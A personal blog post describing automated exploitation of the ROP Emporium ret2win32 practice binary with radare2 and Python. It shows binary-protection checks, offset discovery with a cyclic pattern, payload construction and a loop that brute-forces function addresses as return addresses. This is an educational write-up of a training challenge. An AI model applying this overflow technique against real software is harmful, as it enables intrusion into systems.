Binary Exploitation Automation with Radare2

Before I dive into describing my process, I want to start with a little disclaimer:

This post is by no means a complete guide to automating any kind of practical, real-world binary exploitation. It simply describes something I learned a while back but never got around to posting about, and you never know, there might still be people interested in parts of this process.

This has been lying around for quite some time and is by no means a super advanced or creative way of doing this (build stuff in your backyard for fun).

ROP Exploitation

This post will not go into the technical details of ROP (Return Oriented Programming). There are plenty of posts about this technique, written by people who can explain it far better than I ever could. I will, however, bless you with some awesome resources regarding the topic:

ret2win32

For anyone who is interested in learning ROP but doesn’t know where to start: ROP Emporium

ROP Emporium is a website that teaches you all about ROP and how to exploit it, and even provides some tools that are described in the beginner’s guide on the website. ret2win32 is one of the first challenges on the website to get your feet wet; it is the same binary I used to familiarize myself with ways of exploiting it in an automated fashion with radare2.

Gathering information

With the target in sight I started off walking the usual path, gathering some information about the binary so I know what I’m dealing with:

 ~/RaROP ▓▒░ rabin2 -I ret2win32                                                                  
arch     x86
baddr    0x8048000
binsz    6442
bintype  elf
bits     32
canary   false
class    ELF32
compiler GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crypto   false
endian   little
havecode true
intrp    /lib/ld-linux.so.2
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  Intel 80386
maxopsz  16
minopsz  1
nx       true
os       linux
pcalign  0
pic      false
relocs   true
relro    partial
rpath    NONE
sanitiz  false
static   false
stripped false
subsys   linux
va       true

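As can be seen in the above output, the NX bit is set, which means that the stack will not be executable. There is also no stack canary (canary false) and the binary is not position independent (pic false), so a saved return address can be overwritten and the function addresses stay fixed between runs.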
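If you want a script to make the same check, the key/value output above is easy to parse. The following is a minimal sketch; the helper name parse_rabin2_info is my own, and the sample text is just a few lines copied from the output above:

```python
def parse_rabin2_info(text):
    """Turn `rabin2 -I` style key/value lines into a dict of strings."""
    info = {}
    for line in text.splitlines():
        parts = line.split(None, 1)  # key first, then the rest of the line
        if len(parts) == 2:
            info[parts[0]] = parts[1].strip()
    return info


# A few lines copied from the rabin2 output shown in this post
sample = """\
arch     x86
bits     32
canary   false
nx       true
pic      false
relro    partial
"""

info = parse_rabin2_info(sample)
# NX on: shellcode placed on the stack would not run, so existing code is reused.
# No canary, no PIC: overwriting the return address with a fixed address is plausible.
print(info["nx"], info["canary"], info["pic"])
```

In a real script the text would come from running rabin2 yourself, for example through the subprocess module.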

We start off with radare2 in debugging mode, set a breakpoint at main, and continue execution. You could of course do some static information gathering first, but I’m more of a struggle-as-you-learn kinda person:

 ~/RaROP ▓▒░ r2 -d ret2win32                                                                        
Process with PID 3077 started...
= attach 3077 3077
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
 -- Jingle sploits, jingle sploits, ropchain all the way.
[0xf7fa5c70]> db main
[0xf7fa5c70]> dc
hit breakpoint at: 804857b
[0x0804857b]>

Everything still works, so let’s analyze the functions:

[0x0804857b]> aaa
[Cannot analyze at 0x08048470g with sym. and entry0 (aa)
[x] Analyze all flags starting with sym. and entry0 (aa)
[Warning: Invalid range. Use different search.in=? or anal.in=dbg.maps.x
Warning: Invalid range. Use different search.in=? or anal.in=dbg.maps.x
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[TOFIX: aaft can't run in debugger mode.ions (aaft)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x0804857b]> afl
0x08048480    1 33           entry0
0x08048440    1 6            sym.imp.__libc_start_main
0x080484c0    4 43           sym.deregister_tm_clones
0x080484f0    4 53           sym.register_tm_clones
0x08048530    3 30           entry.fini0
0x08048550    4 43   -> 40   entry.init0
0x080485f6    1 99           sym.pwnme
0x08048460    1 6            sym.imp.memset
0x08048420    1 6            sym.imp.puts
0x08048400    1 6            sym.imp.printf
0x08048410    1 6            sym.imp.fgets
0x08048659    1 41           sym.ret2win
0x08048430    1 6            sym.imp.system
0x080486f0    1 2            sym.__libc_csu_fini
0x080484b0    1 4            sym.__x86.get_pc_thunk.bx
0x080486f4    1 20           sym._fini
0x08048690    4 93           sym.__libc_csu_init
0x0804857b    1 123          main
0x08048450    1 6            sym.imp.setvbuf
0x080483c0    3 35           sym._init
[0x0804857b]>

Oh my, a function with the name ‘pwnme’? Let’s look at this a little bit closer:

[0x0804857b]> pd @ 0x080485f6

Because I want to keep this post on the short side, I will just describe what is in there, and you will have to take my word for it that I’m telling the truth (or don’t, and do the ret2win thingy yourself).

This function also holds the print statement and takes the input with fgets at 0x0804864e. The fgets function is responsible for reading the user input and storing it in memory. Because it is allowed to read more bytes than the buffer can hold, we can write past the end of the buffer, overwrite the saved return address on the stack, and thereby load EIP with a value of our own.
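To make the overwrite concrete, here is a minimal sketch of what such an input looks like: filler bytes up to the saved return address, followed by the new address in 32-bit little-endian byte order. The helper name build_payload is my own, and the offset of 44 is only a placeholder for illustration, not a value measured in this post; the address is the one afl printed for sym.ret2win.

```python
import struct


def build_payload(offset, return_address, filler=b"A"):
    """Filler up to the saved return address, then the new address (little-endian)."""
    return filler * offset + struct.pack("<I", return_address)


# 44 is a placeholder offset; 0x08048659 is sym.ret2win from the afl output
payload = build_payload(44, 0x08048659)
print(payload[-4:].hex())  # 59860408
```

The address bytes come out reversed because x86 is little-endian (see the endian line in the rabin2 output).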

Way of the Automation

Normally we would gather the right information to construct our payload and return into the function that we want to reach to complete the challenge.

My take on this kind of binary in particular, where no special input values are needed to validate the call to that function, is to write a simple script that leverages the radare2 framework to try the address of every function as the return address. These addresses can be extracted with the afl command.
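Extracting the candidates from afl can be sketched as follows. This is not the code from my script, just a small illustration: parse_afl is a name made up for this example, the sample lines are copied from the afl output above, and imports (sym.imp.) are skipped because they are stubs for library functions rather than functions of the binary itself.

```python
def parse_afl(text):
    """Parse `afl` output lines into (address, name) tuples."""
    functions = []
    for line in text.splitlines():
        fields = line.split()
        # A function line starts with a hex address and ends with the name
        if len(fields) >= 4 and fields[0].startswith("0x"):
            functions.append((int(fields[0], 16), fields[-1]))
    return functions


# Lines copied from the afl output shown earlier
sample = """\
0x08048480    1 33           entry0
0x08048550    4 43   -> 40   entry.init0
0x080485f6    1 99           sym.pwnme
0x08048420    1 6            sym.imp.puts
0x08048659    1 41           sym.ret2win
"""

candidates = [
    (address, name)
    for address, name in parse_afl(sample)
    if not name.startswith("sym.imp.")
]
for address, name in candidates:
    print(hex(address), name)
```

radare2 can also print JSON (the j suffix on commands, e.g. aflj), which would be a sturdier input than column splitting if you drive it through r2pipe.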

The thought process I have can be described as follows:

  1. The script takes a buffer which is used to crash the program;
  2. With the pwn library a unique pattern is created that is used to locate the offset of the crash;
  3. The EIP value is extracted when the program crashes and looked up in the pwn pattern to find the offset;
  4. The addresses of the different functions in the program are retrieved;
    • The functions starting with sym.imp. are not used because these are imports: stubs for library functions such as puts and fgets, not functions defined in the binary itself (this holds for this specific binary, but also for most other binaries loaded in radare2, see radare2 flags);
  5. The brute force starts checking every function address, using it as the return address that is appended to the garbage pattern used to generate the crash;
  6. To run the program with this payload, the radare2 profile option is used: the profile stores the payload and feeds it to the program the moment it asks for user input. A debug profile is needed because the program’s stdout would normally be redirected to the debugged process; the profile ensures that this output is piped to the user’s radare2 process;
  7. After each attempt, the output is searched for the string flag; if it is present, the script prints the program’s output.
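Steps 2, 3, 5 and 7 can be sketched without radare2 in the loop. This is an illustration under assumptions, not my actual script: make_pattern is a stand-in for the pattern from the pwn library (which offers cyclic and cyclic_find for this), run_target is a hypothetical callable that runs the binary with a payload and returns its output, and the offset of 44 is only an example value.

```python
import itertools
import string
import struct


def make_pattern(length):
    """Non-repeating filler built from upper/lower/digit triples: Aa0Aa1Aa2..."""
    triples = (
        upper + lower + digit
        for upper in string.ascii_uppercase
        for lower in string.ascii_lowercase
        for digit in string.digits
    )
    needed = (length + 2) // 3  # enough triples to cover `length` bytes
    return "".join(itertools.islice(triples, needed))[:length].encode()


def find_offset(pattern, eip):
    """Return where the 4 bytes found in EIP sit inside the pattern (-1 if absent)."""
    return pattern.find(struct.pack("<I", eip))


def brute_force(candidates, offset, run_target):
    """Try every (address, name) pair as the return address.

    `run_target` is a hypothetical callable: payload bytes in, program output out.
    Returns (name, output) for the first output containing "flag", else None.
    """
    for address, name in candidates:
        payload = b"A" * offset + struct.pack("<I", address)
        output = run_target(payload)
        if "flag" in output:
            return name, output
    return None


pattern = make_pattern(100)
# Pretend the crash left pattern bytes 44..47 in EIP (44 is an illustrative value)
crashed_eip = struct.unpack("<I", pattern[44:48])[0]
print(find_offset(pattern, crashed_eip))  # 44
```

Passing run_target in as a parameter keeps the loop independent of how the binary is actually started, which in my case is radare2 with a debug profile.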

radare2 profile

The above steps are actually quite simple. However, it took me a little while to automate the part where the program reads a value from stdin, since that value has to be the buffer that overflows the stack.

This is why the radare2 profile is created (somewhat) dynamically: the contents are written to profile.rr2, which in turn gets read when debug mode is entered. So for everyone reading this and wondering how, the following code snippet shows it:

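# `pattern` holds the payload: the garbage pattern plus the candidate return address
with open('profile.rr2', 'w') as profile:
    # a quoted stdin value is handed to the program as literal input
    profile.write('#!/usr/bin/rarun2\nstdin="{0}"\n'.format(pattern))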
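A return address usually contains bytes that are not printable, so one alternative is to store the payload in a separate binary file and point stdin at that file instead of quoting it inline. The sketch below is that variation, not what my script does; it assumes rarun2 treats an unquoted stdin value as a file name (my reading of the rarun2 man page), and the function name and default file names are made up for this example.

```python
def write_profile(payload, profile_path="profile.rr2", payload_path="payload.bin"):
    """Write the raw payload to a file and a rarun2 profile that uses it as stdin."""
    with open(payload_path, "wb") as payload_file:
        payload_file.write(payload)  # raw bytes, nothing to escape
    with open(profile_path, "w") as profile:
        # Assumption: an unquoted stdin value is read by rarun2 as a file name
        profile.write("#!/usr/bin/rarun2\nstdin={0}\n".format(payload_path))
    return profile_path


# Possible use (not run here):
#   write_profile(b"A" * 44 + b"\x59\x86\x04\x08")
#   r2 -r profile.rr2 -d ret2win32
```

The -r option loads the profile when radare2 starts; setting dbg.profile with -e should have the same effect.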

Conclusion

I created a little Python script which you can find here (only works for x86 for now, also only tested on ret2win32).

As you can see in the image below, I probably spent more time on the colors and output than on the script itself. Overall it was a fun weekend project, and I got a good grade with it for one of my university’s courses:

all these beautiful colors

Again, not anything new, groundbreaking or advanced, but for the people that read the whole thing; thank you!

Stay safe in these weird times, spend time with friends and family etc. etc.